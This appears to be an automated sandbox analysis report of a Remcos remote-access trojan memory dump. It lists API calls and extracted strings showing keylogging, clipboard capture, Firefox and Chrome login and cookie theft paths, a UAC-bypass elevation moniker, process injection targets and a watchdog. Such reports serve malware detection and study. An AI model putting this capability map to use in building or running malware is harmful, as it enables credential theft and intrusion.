                                              • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                            • CloseHandle.KERNEL32(00000000), ref: 00412190
                                            • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                            • API String ID: 3018269243-13974260
                                            • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                            • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                            • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                            • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                            • FindClose.KERNEL32(00000000), ref: 0040BC04
                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                            • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                            • API String ID: 1164774033-3681987949
                                            • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                            • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                            • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                            • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                            APIs
                                            • OpenClipboard.USER32 ref: 004168FD
                                            • EmptyClipboard.USER32 ref: 0041690B
                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                            • GlobalLock.KERNEL32(00000000), ref: 00416934
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                            • CloseClipboard.USER32 ref: 00416990
                                            • OpenClipboard.USER32 ref: 00416997
                                            • GetClipboardData.USER32(0000000D), ref: 004169A7
                                            • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                            • CloseClipboard.USER32 ref: 004169BF
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                            • String ID: !D@
                                            • API String ID: 3520204547-604454484
                                            • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                            • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                            • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                            • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                            • FindClose.KERNEL32(00000000), ref: 0040BE04
                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                            • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                            • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$Close$File$FirstNext
                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                            • API String ID: 3527384056-432212279
                                            • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                            • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                            • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                            • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                            • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                            • API String ID: 3756808967-1743721670
                                            • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                            • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                            • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                            • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0$1$2$3$4$5$6$7$VG
                                            • API String ID: 0-1861860590
                                            • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                            • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                            • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                            • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                            APIs
                                            • _wcslen.LIBCMT ref: 0040755C
                                            • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Object_wcslen
                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                            • API String ID: 240030777-3166923314
                                            • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                            • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                            • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                            • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                            APIs
                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                            • GetLastError.KERNEL32 ref: 0041A84C
                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                            • String ID:
                                            • API String ID: 3587775597-0
                                            • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                            • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                            • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                            • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                            • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                            • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                            • String ID: JD$JD$JD
                                            • API String ID: 745075371-3517165026
                                            • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                            • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                            • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                            • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                            • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                            • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                            • API String ID: 1164774033-405221262
                                            • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                            • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                            • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                            • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                            • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                            • String ID:
                                            • API String ID: 2341273852-0
                                            • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                            • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                            • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                            • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Find$CreateFirstNext
                                            • String ID: 8SG$PXG$PXG$NG$PG
                                            • API String ID: 341183262-3812160132
                                            • Opcode ID: 2aa8bf03968caedae2c1f783026ec1f2ab33015732b8bfe7ccea484fd5ec6f7f
                                            • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                            • Opcode Fuzzy Hash: 2aa8bf03968caedae2c1f783026ec1f2ab33015732b8bfe7ccea484fd5ec6f7f
                                            • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                            • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                            • GetLastError.KERNEL32 ref: 0040A328
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                            • TranslateMessage.USER32(?), ref: 0040A385
                                            • DispatchMessageA.USER32(?), ref: 0040A390
                                            Strings
                                            • Keylogger initialization failure: error , xrefs: 0040A33C
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                            • String ID: Keylogger initialization failure: error
                                            • API String ID: 3219506041-952744263
                                            • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                            • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                            • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                            • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 0040A451
                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                            • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                            • GetKeyState.USER32(00000010), ref: 0040A46E
                                            • GetKeyboardState.USER32(?), ref: 0040A479
                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                            • String ID:
                                            • API String ID: 1888522110-0
                                            • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                            • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                            • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                            • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                            • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                            • API String ID: 2127411465-314212984
                                            • Opcode ID: 09788986c499ccf61a32fa2fa99dcd6ee3d0b3087326da66d508dcd15781bba8
                                            • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                            • Opcode Fuzzy Hash: 09788986c499ccf61a32fa2fa99dcd6ee3d0b3087326da66d508dcd15781bba8
                                            • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                            APIs
                                            • _free.LIBCMT ref: 00449292
                                            • _free.LIBCMT ref: 004492B6
                                            • _free.LIBCMT ref: 0044943D
                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                            • _free.LIBCMT ref: 00449609
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                            • String ID:
                                            • API String ID: 314583886-0
                                            • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                            • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                            • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                            • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                            APIs
                                              • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                              • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                              • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                              • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                              • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                            • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                            • String ID: !D@$PowrProf.dll$SetSuspendState
                                            • API String ID: 1589313981-2876530381
                                            • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                            • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                            • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                            • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                            APIs
                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                            • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                            • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                            Strings
                                            • http://geoplugin.net/json.gp, xrefs: 0041B448
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleOpen$FileRead
                                            • String ID: http://geoplugin.net/json.gp
                                            • API String ID: 3121278467-91888290
                                            • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                            • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                            • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                            • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                            APIs
                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                            • GetLastError.KERNEL32 ref: 0040BA93
                                            Strings
                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                            • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                            • UserProfile, xrefs: 0040BA59
                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteErrorFileLast
                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                            • API String ID: 2018770650-1062637481
                                            • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                            • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                            • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                            • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                            • GetLastError.KERNEL32 ref: 004179D8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                            • String ID: SeShutdownPrivilege
                                            • API String ID: 3534403312-3733053543
                                            • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                            • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                            • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                            • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00409293
                                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
